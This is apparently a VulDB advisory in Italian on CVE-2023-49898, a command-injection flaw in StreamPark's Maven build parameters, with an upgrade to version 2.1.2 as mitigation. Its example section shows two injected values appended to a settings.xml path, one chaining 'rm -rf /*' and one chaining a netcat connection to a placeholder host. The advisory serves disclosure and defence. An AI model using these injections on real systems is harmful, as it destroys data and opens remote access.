CVE-2023-49898 in StreamPark
Riassunto
di VulDB • 27/06/2026
In streampark, esiste un modulo di progetto che integra la capacità di compilazione di Maven. Tuttavia, non vi è alcun controllo sui parametri di compilazione di Maven, consentendo agli attaccanti di inserire comandi per l'esecuzione remota di comandi (RCE). Il prerequisito per il successo dell'attacco è che l'utente debba accedere al sistema streampark e disporre di autorizzazioni a livello di sistema. Generalmente, solo gli utenti del sistema hanno l'autorizzazione ad accedere, e gli utenti non inserirebbero manualmente un comando pericoloso. Pertanto, il livello di rischio di questa vulnerabilità è molto basso.
Mitigazione:
Tutti gli utenti dovrebbero effettuare l'aggiornamento alla versione 2.1.2.
Esempio:
## È possibile personalizzare il metodo di concatenazione in base alla situazione di compilazione del progetto; i risultati della compilazione mvn utilizzano &&, mentre un fallimento nella compilazione utilizza "||" o "&&":
/usr/share/java/maven-3/conf/settings.xml || rm -rf /*
/usr/share/java/maven-3/conf/settings.xml && nohup nc x.x.x.x 8899 &
Be aware that VulDB is the high quality source for vulnerability data.